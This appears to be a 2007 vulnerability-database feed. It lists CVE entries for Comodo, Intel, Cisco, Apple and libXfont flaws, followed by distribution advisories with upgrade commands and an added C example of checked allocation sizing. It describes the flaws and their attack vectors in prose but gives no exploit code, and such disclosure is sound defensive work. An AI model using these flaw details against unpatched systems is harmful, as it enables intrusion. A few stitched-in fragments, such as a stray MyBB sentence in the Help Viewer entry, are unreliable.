cmdmon.sys in Comodo Firewall Pro (formerly Comodo Personal Firewall) 2.4.16.174 and earlier does not validate arguments that originate in user mode for the (1) NtCreateSection, (2) NtOpenProcess, (3) NtOpenSection, (4) NtOpenThread, and (5) NtSetValueKey hooked SSDT functions, which allows local users to cause a denial of service (system crash) and possibly gain privileges via invalid arguments. Comodo Firewall Pro is prone to a denial-of-service vulnerability. Local attackers may exploit this vulnerability to cause denial of service. The Comodo firewall hooks many functions in the SSDT, and in at least 7 cases it does not validate parameters that originate in user mode. Due to a bug in the cmdmon.sys driver, a denial of service may result when calling NtConnectPort, NtCreatePort, NtCreateSection, NtOpenProcess, NtOpenSection, NtOpenThread, and NtSetValueKey.
| VAR-200702-0091 | CVE-2007-0686 | w29n51.sys Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The Intel 2200BG 802.11 Wireless Mini-PCI driver 9.0.3.9 (w29n51.sys) allows remote attackers to cause a denial of service (system crash) via crafted disassociation packets, which triggers memory corruption of "internal kernel structures," a different vulnerability than CVE-2006-6651. NOTE: this issue might overlap CVE-2006-3992. The Intel 2200BG 802.11 Wireless Mini-PCI driver (w29n51.sys) contains a vulnerability that can result in a denial of service (system crash). This is a different vulnerability from CVE-2006-6651.
| VAR-200702-0071 | CVE-2007-0666 | Ipswitch WS_FTP Server Vulnerable to arbitrary code execution on the system |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Ipswitch WS_FTP Server 5.04 allows FTP site administrators to execute arbitrary code on the system via a long input string to the (1) iFTPAddU or (2) iFTPAddH file, or to a (3) edition module
| VAR-200702-0107 | CVE-2007-0708 | Comodo Firewall Pro of cmdmon.sys Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
cmdmon.sys in Comodo Firewall Pro (formerly Comodo Personal Firewall) before 2.4.16.174 does not validate arguments that originate in user mode for the (1) NtConnectPort and (2) NtCreatePort hooked SSDT functions, which allows local users to cause a denial of service (system crash) and possibly gain privileges via invalid arguments. Comodo Firewall is prone to multiple denial-of-service vulnerabilities because it fails to adequately validate user supplied data.
Exploiting these issues may permit attackers to cause system crashes and deny service to legitimate users. Presumably, attackers may also be able to execute arbitrary code, but this has not been confirmed.
Comodo Firewall Pro 2.4.16.174 and Comodo Personal Firewall 2.3.6.81 are vulnerable; other versions may also be affected. The Comodo firewall hooks many functions in the SSDT, and in at least 7 cases it does not validate parameters that originate in user mode. Due to a bug in the cmdmon.sys driver, a denial of service may result when calling NtConnectPort, NtCreatePort, NtCreateSection, NtOpenProcess, NtOpenSection, NtOpenThread, and NtSetValueKey.
| VAR-200702-0384 | CVE-2007-0648 | Cisco IOS fails to properly handle Session Initiated Protocol packets |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco IOS after 12.3(14)T, 12.3(8)YC1, 12.3(8)YG, and 12.4, with voice support and without Session Initiated Protocol (SIP) configured, allows remote attackers to cause a denial of service (crash) by sending a crafted packet to port 5060/UDP. Exploitation of this vulnerability may result in a denial-of-service condition. According to Cisco Systems, in specific affected versions the SIP port (5060/TCP,UDP) is reported to be open by default even when it is not needed. Processing a SIP packet crafted by a third party may put a Cisco IOS device running the SIP service into a denial-of-service (DoS) state.
This issue affects only devices that support voice communications but don't have SIP enabled.
Attackers can exploit this issue to reload a vulnerable device.
IOS releases subsequent to 12.3(14)T, 12.3(8)YC1, and 12.3(8)YG are vulnerable. All 12.4 releases are affected as well. In addition, some IOS versions that support SIP services may process SIP messages even if no SIP operations are configured. If you want to process SIP messages, IOS needs to open UDP port 5060 and TCP port 5060 for listening. Devices not listening on TCP 5060 or UDP 5060 are not affected by the vulnerability. Since SIP uses UDP for transport, it is possible to spoof the IP address of the sender, which can invalidate ACLs that allow traffic from trusted IP addresses to those ports
| VAR-200702-0128 | CVE-2007-0661 | Intel Enterprise Southbridge Baseboard Management Controller In IPMI Command issue vulnerability |
CVSS V2: 5.4 CVSS V3: - Severity: MEDIUM |
Intel Enterprise Southbridge 2 Baseboard Management Controller (BMC), Intel Server Boards 5000XAL, S5000PAL, S5000PSL, S5000XVN, S5000VCL, S5000VSA, SC5400RA, and OEM Firmware for Intel Enterprise Southbridge Baseboard Management Controller before 20070119, when Intelligent Platform Management Interface (IPMI) is enabled, allow remote attackers to connect and issue arbitrary IPMI commands, possibly triggering a denial of service. By issuing commands to this interface, attackers can trigger denial-of-service conditions, but they cannot gain access to the operating system or data contained in affected computers.
Firmware versions prior to release 57 are vulnerable to this issue. Intel Southbridge 2 is the Southbridge used on many Intel server motherboards. But successful exploitation of this vulnerability can only result in a denial of service
| VAR-200702-0383 | CVE-2007-0647 | Help Viewer Format string vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Format string vulnerability in Help Viewer 3.0.0 allows remote user-assisted attackers to cause a denial of service (crash) via format string specifiers in a filename, which is not properly handled when calling the NSBeginAlertSheet Apple AppKit function. Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie.
Exploiting these issues can allow attacker-supplied data to be written to arbitrary memory locations, which can facilitate the execution of arbitrary machine code with the privileges of a targeted application. Failed exploit attempts will likely crash the application.
Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well. A format string vulnerability exists in MyBB (aka MyBulletinBoard) version 1.2.2
| VAR-200702-0381 | CVE-2007-0645 | iPhoto Format string vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Format string vulnerability in iPhoto 6.0.5 allows remote user-assisted attackers to cause a denial of service (crash) via format string specifiers in a filename, which is not properly handled when calling certain Apple AppKit functions. Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie.
Exploiting these issues can allow attacker-supplied data to be written to arbitrary memory locations, which can facilitate the execution of arbitrary machine code with the privileges of a targeted application. Failed exploit attempts will likely crash the application.
Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well. A format string vulnerability exists in iPhoto version 6.0.5
| VAR-200702-0380 | CVE-2007-0644 | Apple Safari Format string vulnerability |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Format string vulnerability in Apple Safari 2.0.4 (419.3) allows remote user-assisted attackers to cause a denial of service (crash) via format string specifiers in filenames that are not properly handled when calling the (1) NSLog and (2) NSBeginAlertSheet Apple AppKit functions. Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie.
Exploiting these issues can allow attacker-supplied data to be written to arbitrary memory locations, which can facilitate the execution of arbitrary machine code with the privileges of a targeted application. Failed exploit attempts will likely crash the application.
Help Viewer 3.0.0, Safari 2.0.4, iMovie HD 6.0.3, and iPhoto 6.0.5 are reported affected; other versions may be vulnerable as well
| VAR-200704-0229 | CVE-2007-1352 | X.Org and XFree86 libfont of FontFileInitTable() Integer overflow vulnerability in functions |
CVSS V2: 3.8 CVSS V3: - Severity: LOW |
Integer overflow in the FontFileInitTable function in X.Org libXfont before 20070403 allows remote authenticated users to execute arbitrary code via a long first line in the fonts.dir file, which results in a heap overflow. The FontFileInitTable() function used in libXfont of X.Org and XFree86 contains an integer overflow vulnerability that is triggered when an excessively long string is specified on the first line of the fonts.dir file. A malicious user who can connect to the X server may crash it, causing a denial of service (DoS), or execute arbitrary code with the privileges of the X server (root). The 'libXfont' library is prone to multiple local integer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data.
An attacker can exploit these vulnerabilities to execute arbitrary code with superuser privileges. Failed exploit attempts will likely cause denial-of-service conditions.
These issues affect libXfont 1.2.2; other versions may also be vulnerable. X.Org is an official reference implementation of the X Window System operated by the X.Org Foundation. X.Org's LibXFont library has an integer overflow when parsing BDF fonts, allowing attackers to cause heap overflow through specially crafted BDF fonts.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200705-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: LibXfont, TightVNC: Multiple vulnerabilities
Date: May 08, 2007
Bugs: #172575, #174200
ID: 200705-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been reported in libXfont and TightVNC,
allowing for the execution of arbitrary code with root privileges.
Background
==========
LibXfont is the X.Org font library. TightVNC is a VNC client/server for
X displays.
Affected packages
=================
-------------------------------------------------------------------
     Package             /  Vulnerable  /               Unaffected
-------------------------------------------------------------------
  1  net-misc/tightvnc       < 1.2.9-r4                >= 1.2.9-r4
  2  x11-libs/libXfont       < 1.2.7-r1                >= 1.2.7-r1
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------
Description
===========
The libXfont code is prone to several integer overflows, in functions
ProcXCMiscGetXIDList(), bdfReadCharacters() and FontFileInitTable().
TightVNC contains a local copy of this code and is also affected.
Impact
======
A local attacker could use a specially crafted BDF Font to gain root
privileges on the vulnerable host.
Resolution
==========
All libXfont users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=x11-libs/libXfont-1.2.7-r1"
All TightVNC users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/tightvnc-1.2.9-r4"
References
==========
[ 1 ] CVE-2007-1003
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1003
[ 2 ] CVE-2007-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1351
[ 3 ] CVE-2007-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1352
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200705-10.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
_______________________________________________________________________
Mandriva Linux Security Advisory MDKSA-2007:080-1
http://www.mandriva.com/security/
_______________________________________________________________________
Package : tightvnc
Date : April 10, 2007
Affected: 2007.1
_______________________________________________________________________
Problem Description:
Local exploitation of a memory corruption vulnerability in the X.Org
and XFree86 X server could allow an attacker to execute arbitrary
code with privileges of the X server, typically root.
The vulnerability exists in the ProcXCMiscGetXIDList() function in the
XC-MISC extension. This request is used to determine what resource IDs
are available for use. This function contains two vulnerabilities,
both result in memory corruption of either the stack or heap. The
ALLOCATE_LOCAL() macro used by this function allocates memory on the
stack using alloca() on systems where alloca() is present, or using
the heap otherwise. The handler function takes a user provided value,
multiplies it, and then passes it to the above macro. This results in
both an integer overflow vulnerability, and an alloca() stack pointer
shifting vulnerability. (CVE-2007-1003)
iDefense reported two integer overflows in the way X.org handled
various font files. (CVE-2007-1351, CVE-2007-1352)
TightVNC uses some of the same code base as Xorg, and has the same
vulnerable code.
Updated packages are patched to address these issues.
Update:
Packages for Mandriva Linux 2007.1 are now available.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1003
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1352
_______________________________________________________________________
Updated Packages:
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
. (CVE-2007-1351, CVE-2007-1352)
Multiple integer overflows in (1) the XGetPixel function in ImUtil.c
in x.org libx11 before 1.0.3, and (2) XInitImage function in xwd.c for
ImageMagick, allow user-assisted remote attackers to cause a denial
of service (crash) or information leak via crafted images with large
or negative values that trigger a buffer overflow.
TITLE:
Linux-PAM Login Bypass Security Vulnerability
SECUNIA ADVISORY ID:
SA23858
VERIFY ADVISORY:
http://secunia.com/advisories/23858/
CRITICAL:
Moderately critical
IMPACT:
Security Bypass
WHERE:
From remote
SOFTWARE:
Linux-PAM 0.x
http://secunia.com/product/1701/
DESCRIPTION:
A vulnerability has been reported in Linux-PAM, which can be
exploited by malicious people to bypass certain security
restrictions. This can be exploited to login with any
given password if the hash in the passwd file is "!!" or similar.
SOLUTION:
Update to version 0.99.7.1.
PROVIDED AND/OR DISCOVERED BY:
Bernardo Innocenti
ORIGINAL ADVISORY:
https://www.redhat.com/archives/pam-list/2007-January/msg00017.html
http://www.redhat.com/archives/fedora-devel-list/2007-January/msg01277.html
Multiple Vendor X Server fonts.dir File Parsing Integer Overflow
Vulnerability
iDefense Security Advisory 04.03.07
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 03, 2007
I. BACKGROUND
The X Window System (or X11) is a graphical windowing system used on
Unix-like systems. It is based on a client/server model. More
information about the X Window System is available at the
following URL.
http://en.wikipedia.org/wiki/X_Window_System
II. DESCRIPTION
Local exploitation of an integer overflow vulnerability in multiple
vendors' implementations of the X Window System font information file
parsing component could allow execution of arbitrary commands with
elevated privileges.
The vulnerability specifically exists in the parsing of the "fonts.dir"
font information file. When the element count on the first line of the
file specifies it contains more than 1,073,741,824 (2 to the power of
30) elements, a potentially exploitable heap overflow condition occurs.
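The size calculation behind both this fonts.dir issue and the ProcXCMiscGetXIDList() issue described earlier on this page (a caller-supplied count multiplied before allocation) can be shown with a checked multiplication beside the unchecked one. This is an added example, not code from X.Org, libXfont or iDefense; the function names, the 4-byte entry size and the 1 MiB limit are assumptions, and 32-bit size arithmetic is modelled with uint32_t.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Assumed for illustration only: a 4-byte table entry and a 1 MiB cap.
 * Neither value is taken from the X.Org or libXfont sources. */
#define ELEM_SIZE   4u
#define TABLE_LIMIT (1u << 20)

/* Unchecked pattern: the byte count is computed in 32-bit arithmetic,
 * so count * elem_size silently wraps modulo 2^32. */
uint32_t unchecked_bytes(uint32_t count, uint32_t elem_size)
{
    return count * elem_size;
}

/* Hardened pattern: refuse the request if the product would wrap or if
 * it exceeds a caller-chosen limit. The limit matters for alloca()-style
 * allocation, where a large but non-wrapping size still moves the stack
 * pointer out of the stack. Returns 0 and stores the size on success. */
int checked_bytes(uint32_t count, uint32_t elem_size,
                  uint32_t limit, uint32_t *out)
{
    if (elem_size == 0 || count > UINT32_MAX / elem_size)
        return -1;                      /* product would wrap */
    if (count * elem_size > limit)
        return -1;                      /* too large for this caller */
    *out = count * elem_size;
    return 0;
}

/* Parse the element count from the first line of a fonts.dir-style file.
 * Rejects empty input, signs, trailing garbage and values above 2^32-1. */
int parse_count(const char *line, uint32_t *count)
{
    char *end;
    unsigned long long v;

    if (line == NULL || *line < '0' || *line > '9')
        return -1;
    errno = 0;
    v = strtoull(line, &end, 10);
    if (errno != 0 || v > UINT32_MAX)
        return -1;
    if (*end != '\0' && *end != '\n')
        return -1;
    *count = (uint32_t)v;
    return 0;
}

/* Allocate a zeroed table for the count named on the first line.
 * Returns NULL, with no allocation, for any count that fails the checks. */
void *alloc_table(const char *first_line, uint32_t *count_out)
{
    uint32_t count, bytes;

    if (parse_count(first_line, &count) != 0)
        return NULL;
    if (checked_bytes(count, ELEM_SIZE, TABLE_LIMIT, &bytes) != 0)
        return NULL;
    *count_out = count;
    return calloc(count ? count : 1, ELEM_SIZE);
}

int main(void)
{
    /* Constructed sample first lines, not taken from a real font directory. */
    const char *samples[] = { "12", "1073741825", "-1", "262145" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint32_t n = 0;
        void *t = alloc_table(samples[i], &n);
        printf("%-12s -> %s\n", samples[i], t ? "allocated" : "rejected");
        free(t);
    }
    /* 2^30 + 1 four-byte entries: the unchecked size wraps to 4 bytes. */
    printf("unchecked size for 2^30+1 entries: %u bytes\n",
           (unsigned)unchecked_bytes(1073741825u, ELEM_SIZE));
    return 0;
}
```

With the assumed 4-byte entry, a count just above 2^30 yields an unchecked allocation of only 4 bytes, which is why the loop that later fills the table writes past the buffer.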
III.
As the X11 server requires direct access to video hardware, it runs with
elevated privileges. A user compromising an X server would gain those
permissions.
In order to exploit this vulnerability, an attacker would need to be
able to cause the X server to use a maliciously constructed font. The
X11 server contains multiple methods for a user to define additional
paths to look for fonts. An exploit has been developed using the "-fp"
command line option to the X11 server to pass the location of the
attack to the server. It is also possible to use "xset" command with
the "fp" option to perform an attack on an already running server.
Some distributions allow users to start the X11 server only if they are
logged on at the console, while others will allow any user to start it.
Attempts at exploiting this vulnerability may put the console into an
unusable state. This will not prevent repeated exploitation attempts.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in X.Org
X11R7.1.
V. WORKAROUND
iDefense is currently unaware of any effective workaround for this
issue.
VI. VENDOR RESPONSE
The X.Org Foundation has addressed this vulnerability with source code
patches. More information can be found from their advisory at the
following URL.
http://lists.freedesktop.org/archives/xorg-announce/2007-april/0286.html
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-1352 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
02/21/2007 Initial vendor notification
02/21/2007 Initial vendor response
04/03/2007 Coordinated public disclosure
IX. CREDIT
This vulnerability was discovered by Greg MacManus of iDefense Labs.
X. LEGAL NOTICES
Copyright © 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
===========================================================
Ubuntu Security Notice USN-448-1 April 03, 2007
freetype, libxfont, xorg, xorg-server vulnerabilities
CVE-2007-1003, CVE-2007-1351, CVE-2007-1352
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 5.10:
libfreetype6 2.1.7-2.4ubuntu1.3
libxfont1 1:0.99.0+cvs.20050909-1.3
xserver-xorg-core 6.8.2-77.3
Ubuntu 6.06 LTS:
libfreetype6 2.1.10-1ubuntu2.3
libxfont1 1:1.0.0-0ubuntu3.3
xserver-xorg-core 1:1.0.2-0ubuntu10.6
Ubuntu 6.10:
libfreetype6 2.2.1-5ubuntu0.1
libxfont1 1:1.2.0-0ubuntu3.1
xserver-xorg-core 1:1.1.1-0ubuntu12.2
After a standard system upgrade you need to reboot your computer to
effect the necessary changes.
Details follow:
Sean Larsson of iDefense Labs discovered that the MISC-XC extension of
Xorg did not correctly verify the size of allocated memory. (CVE-2007-1003)
Greg MacManus of iDefense Labs discovered that the BDF font handling
code in Xorg and FreeType did not correctly verify the size of allocated
memory.
(CVE-2007-1351, CVE-2007-1352)
Updated packages for Ubuntu 5.10:
Size/MD5: 67446 ca456ab89714cb807ab26dfa676578b2
http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg-input-wacom_6.8.2-77.3_i386.deb
Size/MD5: 96986 2799f489d096d23cc91037d7705f7abd
http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xserver-xorg_6.8.2-77.3_i386.deb
Size/MD5: 274176 ea1d2fc5b60b7754d47ada4cbbe7a612
http://security.ubuntu.com/ubuntu/pool/main/x/xorg/xvfb_6.8.2-77.3_i386.deb
Size/MD5: 1383664 7fca88ca86e1d9545c0a5a7ed877f2cf
powerpc architecture (Apple Macintosh G3/G4/G5)
sparc architecture (Sun SPARC/UltraSPARC)
Updated packages for Ubuntu 6.06 LTS:
Source archives:
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
i386 architecture (x86 compatible Intel/AMD)
powerpc architecture (Apple Macintosh G3/G4/G5)
sparc architecture (Sun SPARC/UltraSPARC)
Updated packages for Ubuntu 6.10:
Source archives:
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.2.1-5ubuntu0.1_amd64.deb
Size/MD5: 150940 92d6b1c0aa652e6e8f013ae4048f4062
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.2.1-5ubuntu0.1_amd64.deb
Size/MD5: 668960 0e5ff244ad6488cd3eb801b3768b7eda
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.2.1-5ubuntu0.1_amd64.udeb
Size/MD5: 248264 4328e1df8f13a92086bc6dc0c43add50
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.2.1-5ubuntu0.1_amd64.deb
Size/MD5: 353738 c41d6ae077ca5f31a25cc0f58cbd93c9
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.2.0-0ubuntu3.1_amd64.deb
Size/MD5: 305140 eaa2799e4a889de2924c16629750c749
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.2.0-0ubuntu3.1_amd64.deb
Size/MD5: 354690 d06520d61f32e74f26764e6dbc1c14c4
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.2.0-0ubuntu3.1_amd64.deb
Size/MD5: 242998 5e24330de281bfc1bd33341abb57d967
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.1.1-0ubuntu12.2_amd64.deb
Size/MD5: 57434 5edf610ecbdd99e59f118959ca0eb414
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.1.1-0ubuntu12.2_amd64.deb
Size/MD5: 813654 4da55af97b7c83f85c557df79f66c0c2
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.1.1-0ubuntu12.2_amd64.deb
Size/MD5: 1427180 efafeb1045b436463419496481cfdc78
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xserver-xephyr_1.1.1-0ubuntu12.2_amd64.deb
Size/MD5: 1608506 39e8887d0c3b1d4b4059a990ccacc07b
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.1.1-0ubuntu12.2_amd64.deb
Size/MD5: 3917424 d69cc89a0777f800d5e74e3a8041fd93
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.1.1-0ubuntu12.2_amd64.deb
Size/MD5: 297442 b41410b7b585f2960827f912241891bc
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.1.1-0ubuntu12.2_amd64.deb
Size/MD5: 1579394 facb0f2f9c2722e4d07af7dea9f838e5
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.2.1-5ubuntu0.1_i386.deb
Size/MD5: 134026 6a3c9319eba74a20e6f5c0e3457a2e97
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.2.1-5ubuntu0.1_i386.deb
Size/MD5: 640492 bb5ed3196a9e9fb626c17d96f40b3b2e
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.2.1-5ubuntu0.1_i386.udeb
Size/MD5: 235400 cde67a8b74de363b4d3e1abe0f41e781
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.2.1-5ubuntu0.1_i386.deb
Size/MD5: 341274 5aee6b86c26c312e17acf68808b737cc
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.2.0-0ubuntu3.1_i386.deb
Size/MD5: 291958 2344c15719ade83c6e125e29e4b86c23
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.2.0-0ubuntu3.1_i386.deb
Size/MD5: 336952 fe81984c7c8cf4a8ca6a0f44998bc0eb
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.2.0-0ubuntu3.1_i386.deb
Size/MD5: 226028 5456ac2131d824a096d1e979cecfcea4
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.1.1-0ubuntu12.2_i386.deb
Size/MD5: 50646 23cd4f9ca5689117c09c43ebdcfea49e
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.1.1-0ubuntu12.2_i386.deb
Size/MD5: 751476 f3769d8fb8508eca644db0c8d9530a08
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.1.1-0ubuntu12.2_i386.deb
Size/MD5: 1327210 73b1fa3c9d0e365f029962cb4e920b8e
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xserver-xephyr_1.1.1-0ubuntu12.2_i386.deb
Size/MD5: 1498720 e7e629d60198742c9040687d9c02d108
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.1.1-0ubuntu12.2_i386.deb
Size/MD5: 3563454 7f18073d92ab9a8a5fbb096b483598b5
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.1.1-0ubuntu12.2_i386.deb
Size/MD5: 297484 7d506b6a3fee567e20a2a5e7aa6c2bc7
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.1.1-0ubuntu12.2_i386.deb
Size/MD5: 1475138 fffb6ddb7a71160b492de7c8987cfc9b
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.2.1-5ubuntu0.1_powerpc.deb
Size/MD5: 148582 24a4dc3fcd4e9ed1cc439178926016b4
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.2.1-5ubuntu0.1_powerpc.deb
Size/MD5: 663380 d84c7eab9c0a1678485b5c10c99e227d
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.2.1-5ubuntu0.1_powerpc.udeb
Size/MD5: 241628 bff6e436dc7884091e9a159425fb3345
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.2.1-5ubuntu0.1_powerpc.deb
Size/MD5: 346870 8da887f46827f7a148b9d5573d6cb526
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont-dev_1.2.0-0ubuntu3.1_powerpc.deb
Size/MD5: 295948 e373a2fb962bbd917ed1475707925379
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1-dbg_1.2.0-0ubuntu3.1_powerpc.deb
Size/MD5: 353796 9ad2219e7d15c1e5267c922f5d518954
http://security.ubuntu.com/ubuntu/pool/main/libx/libxfont/libxfont1_1.2.0-0ubuntu3.1_powerpc.deb
Size/MD5: 237280 a187dc106461ded50a6cafe3b7e5442d
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx-tools_1.1.1-0ubuntu12.2_powerpc.deb
Size/MD5: 63432 d611ac901c34e99a1cfc77956c6f42c4
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xdmx_1.1.1-0ubuntu12.2_powerpc.deb
Size/MD5: 797454 d0208072254a9e1e6041b12f660a7cf0
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xnest_1.1.1-0ubuntu12.2_powerpc.deb
Size/MD5: 1401888 9af060d4e15bcbc8bd55ec3b77f8f733
http://security.ubuntu.com/ubuntu/pool/universe/x/xorg-server/xserver-xephyr_1.1.1-0ubuntu12.2_powerpc.deb
Size/MD5: 1565976 22e88a95a1d3dc23299f782df124578e
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-core_1.1.1-0ubuntu12.2_powerpc.deb
Size/MD5: 3983002 3345dba424bb25e0862b66acda8747d8
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xserver-xorg-dev_1.1.1-0ubuntu12.2_powerpc.deb
Size/MD5: 297498 55dd5abe4abf1c7ef441c85dc070e68a
http://security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.1.1-0ubuntu12.2_powerpc.deb
Size/MD5: 1541334 474f69d831b778c5825ae02d340556e2
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.2.1-5ubuntu0.1_sparc.deb
Size/MD5: 131806 c3d342df6c666a6ff77ad70c7c729297
http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.2.1-5ubuntu0.1_sparc.deb
Size/MD5: 635934 2ba5cf3a10353ed63a2b08a5ebd038ff
http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.2.1-5ubuntu0.1_sparc.udeb
Size/MD5: 220156 4f9315e0d159b61aed69ae09c8282b82
